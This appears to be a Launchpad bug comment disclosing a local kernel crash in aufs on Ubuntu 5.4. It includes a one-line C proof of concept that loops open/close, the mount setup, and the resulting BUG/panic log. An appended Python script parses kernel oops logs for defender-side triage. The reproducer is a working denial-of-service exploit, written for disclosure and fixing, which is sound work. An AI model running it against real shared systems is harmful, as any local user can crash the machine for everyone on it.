Comment 8 for bug 1873074

Mauricio Faria de Oliveira (mfo) wrote :

Exploit / Local:
---

The local exploit is trivial as 'mount | grep aufs' says
whether there's an aufs mountpoint, and usually there is
a file that is 'chmod o+r' that any user could read/open.

(This crashed a virtual machine in 8 hours, overnight.)
See section 'Exploit / Local' below.

Code:

    $ cat <<EOF >exploit.c
    #include <fcntl.h>
    #include <unistd.h>
    int main() { while (!close(open("test", O_RDONLY))); return 0; }
    EOF

    $ gcc -o /tmp/exploit exploit.c

Setup:

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

    $ ls mnt
    test

Run:

    $ cd mnt && /tmp/exploit
    <just let it run until..>

    [29167.866016] kernel BUG at include/linux/fs.h:2963!
    [29167.867423] invalid opcode: 0000 [#1] SMP PTI
    [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
    [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
    [29167.873202] RIP: 0010:__fput+0x25d/0x260
    ...
    [29167.901583] Call Trace:
    [29167.902387] ____fput+0xe/0x10
    [29167.903344] task_work_run+0x8f/0xb0
    [29167.904420] exit_to_usermode_loop+0x131/0x160
    [29167.905749] do_syscall_64+0x163/0x190
    [29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
    ...
    [29167.967808] Kernel panic - not syncing: Fatal exception

(uptime = 29167 seconds / 3600 seconds/hour = 8.10 hours)
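For triage on the defender side, the panic output quoted above can be turned into a structured record (crash site, faulting process, taint flags, kernel version, call trace, uptime) so that crash reports from many hosts can be correlated. The following parser is an added example and is not part of the bug report, the aufs project, or the Ubuntu kernel tooling; the sample input is a constructed copy of the lines quoted in this comment, and the `triggered_from_syscall` heuristic (a trace that passes through `do_syscall_64` or `entry_SYSCALL_64_after_hwframe`) is an assumption used here to flag crashes reached from an ordinary user-space syscall, as in this report.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the oops lines quoted in the bug comment, with the
# "..." elisions kept exactly as they appear there.
SAMPLE_OOPS = """\
[29167.866016] kernel BUG at include/linux/fs.h:2963!
[29167.867423] invalid opcode: 0000 [#1] SMP PTI
[29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
[29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[29167.873202] RIP: 0010:__fput+0x25d/0x260
...
[29167.901583] Call Trace:
[29167.902387] ____fput+0xe/0x10
[29167.903344] task_work_run+0x8f/0xb0
[29167.904420] exit_to_usermode_loop+0x131/0x160
[29167.905749] do_syscall_64+0x163/0x190
[29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
...
[29167.967808] Kernel panic - not syncing: Fatal exception
"""

# printk timestamp in seconds since boot, followed by the message body
TS_RE = re.compile(r"^\s*\[\s*(?P<ts>\d+\.\d+)\]\s*(?P<msg>.*)$")
BUG_RE = re.compile(r"kernel BUG at (?P<loc>\S+)!")
# "PID: n Comm: name Tainted: <flags> <kernel version> #<build>" or "Not tainted"
PROC_RE = re.compile(
    r"PID: (?P<pid>\d+) Comm: (?P<comm>\S+) "
    r"(?:(?P<nt>Not tainted)|Tainted: (?P<taint>.*?))\s+(?P<kver>\d+\.\S+)"
)
RIP_RE = re.compile(r"RIP: [0-9a-f]+:(?P<sym>[^+\s]+)\+0x")
FRAME_RE = re.compile(r"^(?P<sym>[A-Za-z_][\w.]*)\+0x[0-9a-f]+/0x[0-9a-f]+$")
PANIC_RE = re.compile(r"Kernel panic - not syncing: (?P<reason>.*)$")

# Symbols that mark the user-space -> kernel boundary on x86-64 (assumption
# used for the triage heuristic below).
SYSCALL_ENTRY_SYMBOLS = {"do_syscall_64", "entry_SYSCALL_64_after_hwframe"}


@dataclass
class OopsRecord:
    first_ts: Optional[float] = None      # timestamp of the first oops line
    bug_at: Optional[str] = None          # file:line from "kernel BUG at"
    pid: Optional[int] = None
    comm: Optional[str] = None            # name of the current process
    tainted: Optional[str] = None         # taint flags, None if "Not tainted"
    kernel: Optional[str] = None
    rip_symbol: Optional[str] = None      # function containing the faulting RIP
    frames: List[str] = field(default_factory=list)
    panic: Optional[str] = None           # reason string if the box panicked

    @property
    def uptime_hours(self) -> Optional[float]:
        """Uptime at the moment of the crash, derived from the printk timestamp."""
        return None if self.first_ts is None else self.first_ts / 3600.0

    @property
    def triggered_from_syscall(self) -> bool:
        """True when the trace shows the crash was reached from a syscall of `comm`."""
        return any(f in SYSCALL_ENTRY_SYMBOLS for f in self.frames)


def parse_oops(text: str) -> OopsRecord:
    """Parse dmesg/journal lines of one oops into an OopsRecord."""
    rec = OopsRecord()
    in_trace = False
    for line in text.splitlines():
        m = TS_RE.match(line)
        if not m:
            continue                      # skips the "..." elision lines
        ts, msg = float(m.group("ts")), m.group("msg").strip()
        if rec.first_ts is None:
            rec.first_ts = ts
        if (b := BUG_RE.search(msg)):
            rec.bug_at = b.group("loc")
        elif (p := PROC_RE.search(msg)):
            rec.pid, rec.comm = int(p.group("pid")), p.group("comm")
            rec.tainted = None if p.group("nt") else p.group("taint")
            rec.kernel = p.group("kver")
        elif (r := RIP_RE.search(msg)):
            rec.rip_symbol = r.group("sym")
        elif msg == "Call Trace:":
            in_trace = True
        elif (k := PANIC_RE.search(msg)):
            rec.panic = k.group("reason")
            in_trace = False
        elif in_trace and (f := FRAME_RE.match(msg)):
            rec.frames.append(f.group("sym"))
    return rec


if __name__ == "__main__":
    r = parse_oops(SAMPLE_OOPS)
    print(f"{r.comm}[{r.pid}] hit {r.bug_at} in {r.rip_symbol} on {r.kernel} "
          f"(taint={r.tainted}) after {r.uptime_hours:.2f} h; "
          f"from syscall: {r.triggered_from_syscall}; panic: {r.panic}")
```

Running the module prints one summary line for the quoted crash; the same `parse_oops` call can be applied to each oops block extracted from `journalctl -k` or a serial console log, and the `triggered_from_syscall` flag together with `comm` is what separates a user-triggerable crash such as this one from a crash originating in an interrupt or kernel thread.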